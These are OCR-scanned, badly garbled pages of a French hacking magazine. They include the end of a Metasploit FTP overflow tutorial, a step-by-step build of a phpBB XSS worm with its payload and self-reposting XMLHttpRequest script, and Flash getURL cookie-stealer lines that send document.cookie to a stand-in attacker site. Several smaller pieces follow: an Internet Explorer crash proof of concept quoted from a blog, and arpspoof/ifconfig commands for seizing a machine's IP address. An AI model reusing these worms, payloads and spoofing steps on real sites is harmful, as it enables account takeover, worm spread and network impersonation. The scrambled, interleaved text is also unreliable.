Les autres exploits disponibles 
nécessiteront une configuration 
très différentes mais nous avons 
suffisamment énuméré les opéra- 
tions adéquates. Plus tard, lorsque 
vous maîtriserez les différentes 
exploitations possibles, il vous 
appartiendra de constituer vos 
propres exploits selon cet environ- 
nement d'étude. Quelques tuto- 
riaux sont accordés sur le site 
Metasploit notamment en ee 
française. | 
A cet effet, vous remarquerez avec 
une certaine déception peut-être 
que les OS disponibles pour l'ex: 
ploitation de cette vulnérabilité ne 


sont pas selon les versions françai: 


ses. Ici, tout se résume au modèle 
anglais seulement. Il faudrait donc 
modifier la variable de 4 octets qui 


concerne le registre EIP écrasé 
selon l'OS ou Service Pack. De 
cette façon, il est possible d'appor:: 


ter une modification à l'exploit 
directement dans le fichier s'y rap: 
portant, * soit 


3com_3cdaemon_ftp_overflow.p! 


m (utilisez simplement VordPad). 


Néanmoins, attention! Cette 
méthode d'intrusion doit être: 
essentiellement utilisée sur des: 
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Reise vnc en action 


pas ‘chercher’ querelles à d'autres 


administrateurs. Mais:il vous appar- 


tient de pirater votre propre sys- |. 


tème (ne or pas trop dur avec 
vous-même). 


Références 


Le projet : 


http://Www.metasploit.com 
El] http://wwvw.coresecurity.com 


4f2] http://Www.canvas.com 

F3] http://www.securityforest.com/ 
[4] http://www.perl.com 

F5] http://www.osvdb.org/2100 

:[6] http://seclists.org/lists/ 


bugtraq/2002/Jun/0184.html 
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Comprendre la nouvelle menace 


Les failles de type XSS sont plus dange- 
reuses qu'on le croit ! Un nouveau type de 
virus, dont la propagation s'appuie sur ces 
failles, commence à apparaître sur le Net. 
Cet article vous donnera les éléments 
dont vous avez besoin pour comprendre 
leur fonctionnement et leur impact. 


n octobre 2005, le premier 

« Worm xss » est né : Samy, du 

nom de son créateur. En 
moins de 20 heures, il a infecté 
1.000.000 d'utilisateurs de 
MySpace. Plus récemment, le 13 
juin, Yahoo!Mail fut également la 
victime de cette nouvelle généra- 
tion de vers : baptisé Yamanner, ce 
worm xss s'exécutait dès la prévi- 
sualisation du message et s'en- 
voyait à tous les contacts d'un uti- 
lisateur cible, et ce sans son autori- 
sation. Du coup, les contacts étant 
eux aussi contaminés de la même 


‘façon (dès visualisation du mes- 


sage), la propagation du worm 
devenait dès lors de plus en plus 
rapide. 

Afin de comprendre le fonctionne- 
ment de ce nouveau type de mal- 
wares, nous allons créer à titre 
d'exercice un embryon de worm à 
partir d'une vulnérabilité récente 
du célèbre phpBB. 


Faille XSS dans phpBB 


Le 5 janvier 2006, une faille xss pré- 





lEn 


sente sur phpBB 2.0.19 fut rendue 


publique [I]. Elle provient d'un 
mauvais filtrage de certaines balises 
html, lorsque celles-ci sont activées 
sur le forum (ce que nous vous 
déconseillons vivement). 

Voici une manière d'exploiter cette 
faille : 


<B C='>' 
onmouseover='alert( 

"SecurityReason.Com")' 
X='<B ‘> 

_ SecurityReason.Com 

BP SN, CA 


. Nous pouvons utiliser cette faille 


xss afin qu'un‘worm, écrit sur une 
page .js externe, puisse s'exécuter 
sur le forum : 

<PRE A='>° 
onmouseover='document .write( 
"<script src= 
“http://127.0.0.1/xssvirus/ 


moins 


‘de 20 heure 


-000.000 d'uti 


POST/phpbb.:s"></script>" 
) l , 


B='<PRE' > 
{b]Hackademy Powal /b] 
</PRE> 


Le script sera exécuté dès qu'une 
personne passera la souris sur la 
zone de texte. 


Pour poster un 

message 

Notre but étant d'agir sur le 
forum, nous allons nous intéresser 
à la requête http qui permet de 
créer un post sur le forum. On 
pourrait consulter le code PHP du 
forum, ou même le code HTML 
contenant le formulaire en ques- 
tion. Il est cependant plus simple 
d'utiliser par exemple 
LiveHTTPheaders pour Firefox 
[2], ou HttpWatchBasic pour ÎlE 
[3]. 

On peut capturer la requête sui- 
vante, en postant le message vu 
précédemment : 


POST /posting.php 

subfect=zihacksmessage=$3Cpre 
+a53D$527%3E827+onmouseover33D 
$327document .write$28%22%3Cscr 
ipt+src$3D%60http%3A%2F32F127 





s il a infecte 


lisateurs 





s l'auteur du Worm, avait pour but de devenir célèbre. C'est pour- 
quoi il voulait se faire le plus d'amis possible sur MySpace. Samy 
trouva une faille XSS dans MySpace. Beaucoup de balises étaient filtrées 


mais, par contre, 


<div> était acceptée. Certains navigateurs comme 


Internet Explorer acceptent l'exécution de code javaseript dans les balises 


CSS. 
Par exemple : 


<div style= 'background:url('javascript:alert(1)')"> 

Pour contourner les autres filtrages de MySpace, Samy a dû s'appuyer sur 
certaines particularités de IE, toujours très tolérant envers les syntaxes 
HIMEL approximatives. Sans rentrer dans les détails, le code utilisé res- 


semble ainsi plus à ceci : 
<div id=/mycode 


expr='alert( hahl!l')" 


stylie="packground:url( javascript:eval( 
document .all.mycode.expr})')"> 
(Notez le ljavascript! coupé par un retour chariot, ignoré par le filtre, mais 


pourtant bien interprété par IE). 


Toute l'histoire, ainsi que le code source du worm accompagné d'explica- 
tions techniques, se trouve sur le blog de l'auteur (en anglais) : 


http://namb.la/popular/ 


.0.0.1%2Fxssvirus%2FPOST$2Fph 
pbb.:5%60%3E83C%2Fscript$3E%2 
2529%527+b%83D852753Cpre%27+$3E% 
0D$0A$5Bb%5DHackademy+Powa%5B 
A Dot ee 
ictype=0&poll tit 
t=&poll length h=&mo 
de=newtopic&f= one =Submit 
La variable f contient l'id de la caté- 
gorie dans laquelle les messages 


_OPE ion _tex 


vont être envoyés. Ici elle vaut 1, 


c'est-à-dire la première catégorie. 
Le plus dur est fait. Il ne reste plus 
qu'à coder un script qui utilise 
cette requête en boucle. 


Eunereis longis- 
sima © Hans 


Hillewaert, Belgian 
continental shelf. 
CC by-sa/2.5/ 


On va faire appel à 
XmlHttpRequest, bien connu des 
amateurs de AJAX, pour forger nos 
requêtes, 


Un peu de JavaScript: 
Étant donné quesur certains 


forums il.existe un délai pendant 
‘lequel on ne peut pas poster de 


nouveaux messages, on Va faire en 


sorte que le script s'exécute toutes 
les 15 secondes. On va pour cela 
utiliser la fonction sétinterval() [4]. 


Le fait que ce soit au nom de la vic- 


timeque les messages de notre 





script sont envoyés constitue un 
gros avantage car il sera plus diffi- 
cile de revenir à la source de l'at- 
taque. 


Se protéger en aval 

Le principe de base de ces worms, 
qui d'ailleurs est le même que celui 
que nous évoquions au sujet de la 
Livebox dans le dernier numéro, 
consiste à utiliser du JavaScript 
pour provoquer des requêtes GET 
ou POST à l'insu de l'utilisateur : 
une sorte de clic automatique: Ce 
code JavaScript peut d'ailleurs pro- 
venir d'une page extérieure au 
domaine ciblé, par exemple d'un 
site populaire piraté ou d'une page 
perso. Ainsi, ces attaques ne. doi- 
vent pas nécessairement s'appuyer 
sur. une faille de type XSS. 
Cependant,;:lorsque le code pro: 
vient d'un autre domaine, les navi- 
gateurs interdisent - théorique- 
ment - l'accès en lecture à la page 
retournéé par une requête faite à 
travers XmlHttpRequest. Sans ces 
informations, ni Samy, hi Yamanner 
n'auraient pu construire des 


| requêtes valides. Samy, par exem- 
ple, doit connaître l'identifiant de 


ses nouveaux amis, ainsi que lé 


“«token » de l'utilisateur-pour se 
; P 


propager. 

Je vous invite à Sniffer les requêtes 
envoyées lorsque vous envoyez un 
message sur gmail.com. On peut 
observer par exemple ces quel- 
ques paramètres : 
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ex{rAalre toute. ù s les ad esses @yahoo 
= 


diffé: rentes boites de la 


ATIS les 


adresse : 


CITE a cette 


Foitders 

ED Inbox (1) 
CA Draft 
C Sent 
Bulk 


{Add - Edit] 


Date 23 no) Size 
Tue Jun 13, 2006 2k 


Tue Nov22,2005 2k 


Subject 
New Graphic Site 
(Empty] Re: geeks 





On va faire annel à 


XmiHttpRequest, hien connu 
des amateurs de AJAX 


BE g,php HTTP/1,1 
Host: 127.0.0,1 
User-Agent: Mozilla/S.0 (Windows; U; Windows NT.5,1; Fr; rv:1,8.0,4) Gecko/20060508 Firefox/1,5,0,4 
âccept: application/x-shockwave-flash,text/xml, application/xml, application/xhtmi+xml, text/html; q=0,9,text/ 
âccept-Language: fr,fr-fr:q=0.8,en-us;Q=0.5,en;q=0,3 
Accept-Encoding: gzip,deflate 

Accept-Charset: 150-8859-1,utf-8;:q=0,7,*:q=0.7 
Keep-Alive: 300 
Connection: k&ep-alive 
Referer: http://127,0,0.1/2019/phpBB2/posting.php?mode=nentopicefs=#1 
Cookie: phpbb2mysal_data=a%,342%34%7B5%3411%3h%22autologinid222%385%3433%34%22141466 
Content-Type: application/x-www-Form-urlencoded 
Content-Length: 381 Le Contenu de nofrer 





LiveHTTPheaders en action. 


Lt] Cine) Quai] 


Close Tags 


ns mime Lau se 
Font colour: Font +18) Normer 1] 


Font sizet Propre text{[/sire] 


[pre a='>" onmouseover='document,write("< script 

srcæ" http://127,0,0,1/xssvirus/POST/phpbb.js" ></script>") bæ='<pre' > 
[blHackademy Powal/b] 

</prez 





Un post en apparence innocent. 





POST /mail/channel/bind?gat= 
964652452b4666ed- 
10872chb28edb8 
&VER=28SID=127A6C274842EB3A 
&RID=81648z2x=ww0qo279tzxw 
HTTP/1.1 


Ces valeurs aléatoires correspon- 
dent grosso modo à la session de 
l'utilisateur, impossible à deviner. 
De cette manière, il n'est par 
exemple pas possible de forcer un 
utilisateur à envoyer un mail à l'aide 
d'un JavaScript lancé depuis une 
page extérieure à gmail. Par contre, 
si l'on peut exploiter une faille XSS 
(il y en a : 
http://ph3rny.blogspot.com/2006/0 
3/vulnerability-in-gmail.html), c'est 
imparable : ces clés aléatoires sont 
obligatoirement accessibles, sans 
quoi il ne serait pas possible d'en- 
voyer de mail du tout, même 
manuellement. 

Cette précaution n'est cependant 
pas généralisée à tous les web- 
mails. Par ailleurs, de nombreux 
services peuvent être potentielle- 
ment pris pour cible, en plus des 
webmails ou des web-interfaces de 
routeurs/firewallsimodems : paie- 
ments en ligne, systèmes de votes 
et autres bookmark sociaux, blogs, 
etc. 


Conclusion 

Bien sûr, vous auriez pu récupérer 
le cookie de la victime grâce à la 
faille xss, mais le but de cet article 
était de vous montrez la facilité 
d'élaboration d'un worm qui utilise 
le navigateur de la victime à son 
insu. 

Pour aller plus loin, on aurait égale- 
ment pu construire une fonction 
qui renvoie un id d'une catégorie 
aléatoirement, on l'aurait ainsi 
injecté dans notre requête. 
L'attaque se serait ainsi propagée 
sur l'entièreté du forum et non sur 
une seule catégorie. En s'attaquant 
à la messagerie privée du forum, on 
pourrait également gagner en dis- 
crétion. Mais tout cela n'est pas 
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N° avions déjà vanté par le passé les avantages de l'approche 
« white-lisüng » du filtrage de l'html, qui consiste à définir explicite- 
ment les balises et les attributs autorisés, plutôt que d'utiliser une liste de 
balises interdites, qui sera toujours incomplète. 

La petite bibliothèque kses, utilisée notamment par Wordpress pour filtrer 
le contenu des blogs, a bien des chances de s'imposer dans le domaine. 
Voyez plutôt : 

include ‘kses.php'; 

Sallowed = array('b' => array(}), 'i' => array), 

l'a => array(‘href' => 1, ‘title = 
1),)7 

Sval = stripslashes($ POST['val ]);: 

$Sval = kses($val, $allowed);: 


http://sourceforge.net/projects/kses 
http://www.blwood.net/index.php?cat=security&cat2id=108&id=45 
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“Les worms XSs peuvent 


aussi servir a spamer” 





XmiHKipRequert : 
CO LAC CITE 


e « Web 2,0 », c'est le buzz word 
| de désigne une nouvelle ten- 
dance consistant à considérer et 
concevoir les sites Web comme des 
applications distantes, dont les pages 
affichées dans le navigateur ne sont 
qu'une interface. Popularisé par 
Google, cette nouvelle manière de 
développer est réellement en train 
de révolutionner Internet 
(netvibes.com, writely.com, etc. 
etc.). Pour obtenir une interactivité 
directe, les développeurs utilisent du 
JavaScript et des requêtes HTTP 
spéciales, afin de mettre à jour des 
éléments dynamiques du site sans 
avoir à recharger la page entière. 
Ces requêtes renvoient des données 
brutes, par exemple une liste d'ob- 
jets correspondant à des critères de 
recherche, en général sans mise en 
forme, qui seront ensuite placées 
dans des tableaux ou des listes du 
document dynamiquement, grâce 
au JavaScript et au DOM. En 
AJAX, ces données sont représen- 
tées en XML (voir aussi JSON). 
C'est Microsoft, en 1998 déjà, qui a 


introduit un objet ActiveX pour 


Internet Explorer 5.0 permettant de 
scripter ces requêtes. Nous en avions 
déjà parlé il y a quelque temps, puis- 
que cet objet jouait un rôle clé dans 
les attaques par Cross Site Tracing, 
Depuis, les autres navigateurs pro- 
posent une interface équivalente, 
sous le nom de XmlHttpRequest. 

On peut croire, à tort, que cette 
fonctionnalité nuit à la sécurité du 
Web = comme on conseillait d'ail- 
leurs 1l y a quelques années de dés- 
activer le javascript. Pourtant, on 
pouvait déjà provoquer dès requêtes 
HTTP quelconques en.JS, simple- 
menten créant un formulaire-invisi- 
ble et en utilisant la méthode sub- 
mit(). La seule différence est qu'avec 
cette API, on peut récupérer le 
contenu retourné par la requête. 















Snifter gmail. com 


l'objet de cet article. 

Les worms xss peuvent aussi servir 
à spammer (cf Yamanner) ou à 
mener des attaques DDOS. Dans 
le cas de worms xss de grande 
ampleur qui contrôlent énormé- 
ment de navigateurs (Samy en 
contrôlait près d' 1.000.000 !), s'ils 
avaient été programmés afin d'en- 
voyer une autre requête vers un 
site cible chaque seconde, c'est à 
dire 1.000.000 de requêtes par 
seconde, le nombre de Go de don- 
nées envoyées aurait été considé- 
rable ! 

Cela aurait pu mettre à plat n'im- 
porte quel site. 
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Chaetozone setosa © 
Hans Hillewaert, 
Belgian continental 
shelf. CC by-sa/2.5] 


Biwoop 
(Un grand merci à THE_VIP) 


[1] :http://securityreason.com/ 
securityalert/3 13 
[2] : http://livehttpheaders. 





mozdev.org/ 
Voici le code final de notre script : [3] : http:// wWww.httpwatch.com/ 
// JavaScript Document editions.htm 
| function do request(){ [4] :http://aidejavascript.com/ 
| if (window.XMLHttpRequest) // Firefox, Safari, ... article75.html 


xmlihttp = new XMLHttpRequest(}); 
else if (window.ActivexObject) // Nersion IE 


xmihttp = new AcCtiveXObject("Microsoft.XMLHTTP' ); * AJAX 
data = + Web 2.0 
*subject=z1ihackéemessage=%3Cpreta$3D%27%3E%27t+tonmouseover 33D ° XML 

| $27document.writes289%2223Cscripttsrct3D%60http#3A932F32F127. HttpRequest 
| 0.0.132FxSSvirus32FPOST#2Fphpbhb. 526083 #3C42Fscript$3E%228 * JSON 


Si 


29%27+b%3D327%3Cpre%27+53E%0D30A$5Bb35DHackademy+Powas5B&2F * Document WWE D: A 
| b35D#0DS0A83C$2Fpre$3Estopictype=0&poll title=sadd poll opt Object Model * Finite Hére 
| ion text=spoll length=&mode=newtopic&f=1&post=Submit!; 
| 
| 
| 





xmlhttp.open("POST!, 
‘http://127.0.0.1/2019/phpBB2/posting.php", 
true); 
- xmihttp. setRequestheader ( 
{ |  !Content-Type', 
| | ble à ue otturlenconed’ ); 


xmihttp.send(data) ; 11 énvoie de la requête 
JESUS | 


11 SxeGUE LOn toutes ee 15 secondes 
setInterval ("do _request()", 15000); 
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On ne parle plus que de cela depuis des mois mainte- 
nant : la blogmania à envahi le Web. Simplicité, prati- 
que, tout pour donner envie de faire un album photo, 
un journal intime, voire même un site complet, basé 
sur un simple blog. Et le monde de la sécurité n'y 


échappe pas. 


Le blog 

de Bruce Schneier 
Bruce SCHNEIER est un maître à 
penser. Né le 15 Janvier 1963, et 
diplômé en informatique et en phy- 
sique, il travailla pour la défense 
américaine. Fondateur du 
Counterpane Internet Security, 
SCHNEIER est un éminent crypto- 
graphe : on note, parmi ses créa- 
tion dans ce domaine, un algo- 
rithme encore: inviolé (Blowfish), 
ainsi que l'un des plus sérieux can- 
didat à AËS (qui, pour mémoire, fut 
un « concours » international de 
création d'algorithme visant à rem- 
placer DES, algorithme standard). 
URL : 
Http://wwvw.schneier.com/blog 


(anglais) 


Donne-nous notre 

bug quotidien 

Saviez-vous qu'internet Explorer 
comportait certains problèmes de 
sécurité ? Et bien, c'est le cas. 

Et contrairement à l'opinion qu'en 
a son éditeur, le navigateur qui 
reste encore le plus utilisé au 
monde à de quoi distraire, à l'instar 
de bashfr.org, chaque jour. En effet, 
le créateur de ce blog intitulé « 
Browser fun » qui n'est autre que 
l'auteur de Metasploit, H.D. 
MOORE, nous gracie d'une des- 
cription d'un bug IE, à raison, en 
moyenne, d'une fiche par jour. 
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Schneier on Security 
À weblog coveriny security and security technology. 


Friday Squid Blogging: À Marine Blolagist Cornmentsé on “Pirates of the 
Caribbean" 
(Us got souid: 
Danhs: As you can imaginé, l'was plessed with the strong céphalopod thème. 


Chartes: 1 thought you might be upset by the reinforcement of negative squid 
steraotyDes, 


Danna: This might be another “take what 1 can Get” moment, I was somewhat upset 
that the Kraken had all those teeth instesd of à beak, though. 


Chartes: Weil, lots of teeth are scarier. 


Danna: l'd have to disagrée, having spent à couple of wegl:s getting very personal 
with jumbo squid beaks, They'ré very, very sharp. 


Charles: l'take your word for it. l've never bean personal with a squid before, 
Danna: That's probably just as well. Ink: and mucus isn't for everyone. 
Posted on July 14, 2008 25 10113 PM { Comments {2} | Tratacé (0) 


Complexity and Terrorism Investigations 
Gaod artcie on how complenity greatiy limits the effectiveness of terror investigations. The stories 
of wasted resources are all from the UK, but the morals are universal. 


The Commites’s report accepts that tire increasing number of investigations, 
together with their increasing complénity, will make longer détention inevitable in tire 
future, The core calculation is essentially tie one put foreard by the police and 
accepted by the Government - technolooy has been an énabler for international 
terronsmn, with emad, the Internet and mobile telaphony producing wide, diffuse, 
international nétwort:s. The data on hard drives and moblle phones needs to be 
sramined, contacts need to be investigated and their data examined, and in the 
case of an incident, vast amounts of CCTV records noed to he qüne through. As more 
and more of tius needs to be done, die time talien to do it will obviousty climb, and 
+5 ls ‘necessary to detain the new breed of terronst &arty in tire investigation 
before he can strile, more time will be needed between arrast and charge In order 
to build à case, 


Browser Fun 


FRIDAY, JULY 14, 2404 


MoBB #15: Folderitem Access 


The following bug was tested on the latest version of internet Explorer 
4 on à fuly-patched Windows 9! SPZ system. Accessing the object 
référence of this control triggers a NULL derefarence In the security 
check 1 


<object ide"target" 
casside"cisid'FEF10F 42-355 4606-9381 -982407F7CC08"> 
<object» 


vor à = document.gétElementtyadltarget); 
Slert(s.objnct} 


nitratt 


231 009006€ Ab1rOOOOOO C1 -00000000 
2de-09105b62 85001 3h10 2dte01cec1 20 
aipe7cb86cé4 espr001 32084 2hp=0013b184 
SHELL371CFoker1:_SecurityChackK; 


786004 8379000 comp dword ptr fecxrOxc),0x0 
45:002310000000 ce 7771777? 


This bug will be added to ttre OSVOB: 
dalcrosoft if Fokierltent Object NULL Oéraférance 
posted tre din @ 9:41 PM ® 2 comments 8 [links to this post 
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http://browserfun.blogspot.com/ 


RSnake et ID sont deux experts en 
sécurité informatique. Le premier 
s'attache au Web, le second aux 
réseaux et aux OS. Et s'il se pré- 
sentent respectivement comme 
« WebApps God » et « Net & OS 
God », ce n'est pas sans fourni- 


ture : leur blog regorge de pistes de 
recherche et de réflexions très 
fournies sur des domaines aussi 
vastes que la cryptographie ou le 
cross-site scripting, en passant par 
un développement très intéressant 
sur la biométrie (en date du 9 


Juillet, pour info). 


URL : Http://ha.ckers.org/blog/ 


(anglais) 
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Google s'en cache 

Un must. Ce blog dédié à Google 
traite de ses vulnérabilité et de ses 
travaux en matière de sécurité 
Informatique. Le tout, (presque) en 
toute objectivité, et avec une 
bonne régularité. Concernant les 
failles de Google, vous trouverez 
régulièrement les démonstrations 
des failles avérées. Vous trouverez 
aussi des explications sur des 
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Is Accountability the key to Security? 
Luu4 34h, 2006 

Several years 4290 ! was m à meeting with à bunch of #xecs from a 
oumber 8f high level security companies, taling sbout ways to 
imprové Internet security globally. It was à bit of a big wig 
bréæinstorming s48510n. Most of the comments 1 hear werë inhane 
things He “We need IPV6 globally! That would get dd of NATI" and 
An [PS im every home would soive everything." As we went around 
the table : heard more and more 4} thought through ideas that 
probably woulÿ do only more harm than good for internet security, 
Then came my tum, 


1 boked àt these exets who were all more than 10-15 vears older 
than }, with presumably the same level business accumen, and } 
told them, “Accountabiity, If you had accountabifity ‘for every 
transaction, 2very pachet on the antre internet, to trace bal: to 
the person typing the commands, internet crime would nearty halt.” 
Tédsy, 1 St belkeve that to be true, however the cost associated 
nou be enormous - not to mention the backiash, However, let's 
step throughat for academis's benefit: 


» The mœason why blachhat SEO can æust 15 because Google 
Co : 1 iv te ir d Male Avens Li 2 





Dear Google, You Are Giving Me a Poverty. 
Posted by russ under Black Hat Seo 
No Comments 


| After reading that Google sent à leger sine acetaminophen after he wrots an article 
{ entitled "Dear Govgle, You Are Giving Me à Headache”, what the hell - thought jt sas 
| wortha shot, 


Google Auctions XSS Proof of Concept 
Posted by russ under Black Het Séo , Renis and Raves 
{4} Comments 


Note: Google has now fixed the vulnerability, 


After a recent artiche by the foiks at NaoSmart.net 
http://névémart.nèt/blog/archives/194 which ssemingly downplayed the severity and 


| danger posed by KSS Lerues site scripting}, ! thought it pertinent to help alucidate just 
| how powerful XSS can be, The vast majority of XSS proof ofconcepts are limited to 


simple javascript alerts, When visiting an XSS injected url, you se sane pop up that 


? varns you ofthe vulmérability, This is substantial enough for professionals to 
understand the sverity ofthe injection, but to the average web user it semis no more 
| dangerous than any other pop up they encounter, 


| The truth is, however, that XSS is an extremsly powerful mathod through which à 


criminal can ral où the trust a user places in an individual vreb site to coax a usër to 
give up important infrmation, Furthérmare, {t is not limited to just collecting cookie 
data, À well exècuted XSS attack can draw a user through an intricate multi-page fraud 


) whers the Wser emalates through to provide not just ussrnamies and passwords.. Take 
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méthodes d'amélioration des clas- 
sements de pages Web. L'équipe 
Google fait d'ailleurs partie des lec- 
teurs réguliers de ce blog et il n'est 
pas rare de trouver un commen- 
taire de remerciement ou d'expli- 
cation d'un des membres travaillant 
.| sur le fameux moteur de recher- 


Http://Www.thegooglecache.com/ 
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lash est très utilisé pour créer 

des animations dynamiques 

tels que des menus, des publi- 
cités ou encore des signatures. Il 
est livré avec un langage de scrip- 
ting riche en fonctionnalités et faci- 
lités : l'ActionScript. 
Parmi les nombreuses fonctions de 
l'Actionscript nous allons explorer 
plus en détail getURL(). Cette fonc- 
tion [Il] permet d'exécuter des 
requêtes GET et POST. 
Sa syntaxe se construit comme 
suit : 
getURL(url:String,{window: 





String,[method:String]]) 


url : désigne l'url du Site. 
window : spécifie dans quel cadre 
la requête doit avoir lieu (_self, 
_blank …, par défaut _blank) 
method : la méthode de requête 


GET ou POST. (par défaut GET) 
On peut s'appuyer sur getURL(), au 
lieu de passer par une faille XSS, 








On aurait tort de sous-estimer les multiples 
possibilités que nous offrent les fichiers 
Flash de Macromedia, tant du point de vue du 
multimédia... que de l'exploitation de vulné- 
rabilités. Webmasters : pensez à désactiver 
les signatures flash sur vos sites ! 


getUrl() au lieu d'un XSS 


1 getURL("http://site.corw/login.php?logout=true"," self"); 





pour mener des attaques de types 
XSREF sur certains forums ou CMS 
qui acceptent le bbcode flash (par 
exemple Phpbb (addon), nuked- 
klan, etc.). 

Pour déloger quelqu'un par exem- 
ple, on inclurait l'Actionscript sui- 
vant : 

getURL("http://site.com/ 


login.php?logout=yes", 
" self " ) É 


Cela correspond à une requête 
GET impossible à différentier de 
l'opération manuelle équivalente. 


Flashback 

D'autre part, on peut manier du 
Javascript avec de l'Actionscript. 
Par exemple pour afficher une 
alerte : 


“ASS + Flash = 


XSS permanent ” 


getURL("javascript:alert ("Zi 
hack' ‘"): 
En 2002, on démontra le danger de 
cette facilité [2] ; on pouvait par 
exemple afficher le cookie d'un 
visiteurs de cette manière : 
getURL("javascript:alert( 
document.cookie) "“): 
À un autre degré un pirate pouvait 
inclure un script qui récupère le 
cookie de n'importe quel visiteur. 
Il aurait créer un fichier flash 
comme suit et l'aurait inclus sur un 
forum ou autre grâce au Bbcode 
[Flash] 
getURL ("javascript : document. 
location='http://site.com/ 
cookie.php?c="+document. 
cookie"); 


Ce code aurait forcé une requête 
GET qui fournirait le cookie à une 
page contenant un cookiestealer. 

Face à ce danger, Adobe, le créa- 
teur de la technologie Flash a 
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Me certains si sites on peut directement uploader sa signa- 
ash sur le serveur, et donc malgré que allowScriptAccess 
ine » l'attaque sera possible car le fichier flash se trouve sur 
e domaine où le javascript est appelé. 
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modifié ses modèles de sécurité. Il 
existe un paramètre 
allowScriptAccess [3] qui définit si 
du code javascript peut-être exécuté 
dans un fichier flash. Par défaut dans 
la version 6 et 7 du player, cet valeur 
était à « always » , c'est à dire que 
l'ont pouvait exécuter du javascript 
dans un fichier .swf. Depuis la ver- 
sion 8.0, Adobe a modifié la valeur 
par défaut à sameDomain , c'est à 
dire que le code Javascript peut être 
exécuté uniquement si le fichier 
flash se trouve sur le même domaine 
de la page où il est appelé. Cette 
mesure stoppait donc toute exploi- 
tation dangereuse. 


Flash is Back ! 

En Décembre 2005, une nouvelle 
variante est apparue consistant à 
profiter d'une Faille XSS non per- 
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manente et de la possibilité de 
mettre un fichier flash dans sa 
signature pour donner une XSS 
permanente, beaucoup plus dange- 
reuse. 
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D'ailleurs l'auteur de cette variante 
a utilisé cette technique afin d'in- 
fecter MySpace avec un nouveau 


worm xss devié de Samy : Samy: 


Reloaded (cf Rubrique Alerte:!). 
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Le schéma donne : 

Faille XSS non permanente + 
Signature Flash (permanent) = XSS 
Permanente 

L'idée consiste à réaliser une 
requête GET sur l'url où se trouve 
la faille XSS grâce à la fonction 
getURL() de l'Actionscript, de 
cette manière on pourrait exécu- 
ter un code malicieux de manière 
permanente. 

Nous allons voir comment exploi- 
ter ce concept (via une faille XSS 
non-permanente).' 

Flashage 

Notons : 
‘http://lesitevictime.comile fée où 
aura lieu l'attaque: 

‘var la variable! Fi proprement fil: 
tré, du fichier page.php, 


ehetsilimwwsitedupirate.comscripeshf 


url -où.se trouve notre fichier. 
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POST avec getURL : 
var variable:String = 


var env:String = “envoie: 


“ biank', POST"): 


‘http://www.sitedupirate.com/xss.js 
notre fichier javascript contenant 
les instructions malicieuses à exe- 
cuter. 

Il faut donc créer un fichier .swf qui 
envoie une requête GET sur notre 
XSS non permanente : 

GetURL{( "http://www, lesitevic- 

time.com/page.php?var=<script 

src='http://www.sitedupirate/ 

xXSs,js'></script>"," self"); 


De cette manière le contenu de 

notre fichier xss.js sera exécuté 

sur le site victime. 

Une première idée qui vient à l'es- 

prit est de voler le cookie en utili- 

sant une redirection vers un coo- 

kiestealer : 

document, location= 
"http://sitedupirate.com/ 
cookiestealer.php? 
cookie="+document .cookie: 


Mais, étant donné que notre xss non 
permanente est devenue une xss 
permanente, grâce à notre fichier 
flash qui est stocké de manière per- 
manente dans la signature, on peut 
aller plus loin et même construire 
un Worm xss en utilisant 
Xmihttprequest (cf article rubrique 


flash vs. XHTML 





I est important de préciser que la faille xss ne doit pas forcément se 
trouver dans l'url, on aurait très bien pu exploiter cette technique sur 
une faille xss se trouvant dans un formulaire. Voici un exemple de requête 


-\'<script>alert('xss')</script>": 


geEURL( http://blwood.net/experiences/flash.php", 


alerte !), qui injecterai le lien vers le 
fichier script.swf dans le profil des 
visiteurs pour ainsi se propager tou- 
jours de plus en plus vite... 


Conclusion 
Cette nouvelle technique de 
mixage de technologie web, affirme 
toujours d'avantage la faiblesse des 
modèles de sécurité des naviga- 
teurs et des plugins comme Flash. 
Dans ce web toujours en pleine 
expansion, où les technologies de 
cessent d'affluer et de se dévelop- 
per, on ne pense plus à la sécurité 
mais à offrir toujours de nouvelles 
options. 
Dans le cadre de cet article, nous 
avons vu que la fonction getURL() 
offre aux pirates de nouveaux hori- 
zons, de nouvelles possibilités. 
BLwoop 
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P: besoin de flash, ni même de technologie propriétaire pour en met- 
tre plein les yeux. Pour preuve, cette implémentation de Lemmings! 
entièrement codées en utilisant les standards ouverts du Web : 


http://www.elizium.nu/scripts/ 
lemmings/index.html 
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Développé par INL, EdenWall intègre les inno- 
vations exclusives du système NuFW. Cette 
révolution apporte des possibilités inégalées 
d’authentification et de suivi des utilisateurs. 


Introduction 

Les pare-feu filtrent classiquement 
en s'appuyant sur des concepts 
réseaux et ils éprouvent des diffi- 
cultés lorsqu'ils sont confrontés à 
une notion importante : l'utilisa- 
teur. Pourtant, les utilisateurs ont 
naturellement des rôles ou des 
droits différents et il est donc inté- 
ressant de les prendre en compte 
dans les règles de filtrages. Pour 
résoudre cette problématique, la 
quasi totalité des pare-feu utilisent 
un mécanisme associant de 
manière temporaire un utilisateur à 
une IP. NuFW est une exception 
notable puisqu'il refuse cette asso- 
ciation dangereuse et réalise une 


authentification beaucoup plus! 


stricte des flux. 


IP == Utilisateur 

Les méthodes d'authentification 
classiques reposent sur une asso- 
ciation “IP == utilisateur” établie 
grâce à des mécanismes divers : 

+ Portail HTTPS 
+ Connexion 
OpenBSD) 


ssh 


Dans tous les cas, l'authentification : 


repose sur une session établie a 


priori et définissant pendant une: 


durée donnée un couple [IP == 
Utilisateur]. Cependant, 
adresse IP n'est en rien un critère 


d'authentification puisqu'elle est: 


(authpf de 


une : 





susceptible d'être attaquée de 
nombreuses façons comme nous 
allons le voir. 


Arp spoofing attack 

Quel que soit le système d'exploi- 
tation utilisé, il est facile de récupé- 
rer l'adresse d'un poste en cours 
de fonctionnement. Le protocole 
ARP étant basé.sur la confiance, il 
suffit d'envoyer le bon message 
pour que les! équipements asso- 
cient l'adresse IP cible à votre 
adresse MAC. Pour se faire, on 
peut utilisér (sous Linux) la com: 
mande arpspoof fournie-par dsniff 
(http: EN var me AK ee org/rdug- 
song/dsniff/).: | 

arpSPOOf cible : 

où cible est la machine dont on 


souhaite prendre l'IP Il suffit 


ensuite de s'attribuer l'adresse de 
cible : 
ifconfig' eth0 IP cible 


En deux commandes, on prend la 


place d'une machine sur le réseau. 


Celle-ci ne peut plus communiquer 


et hotre machine s'est substitutée 


là hotre cible. 


Modification de 
l'adresse MAC d'un 
poste 

Le filtrage par adresse MAC n'est 
:pa$ non plus une solution, puisqu'il 
est: possible de changer l'adresse 
MAC d'une carte réseau. Toujours 





sous Linux, un simple tcpdump per- 
met de récupérer des adresses 
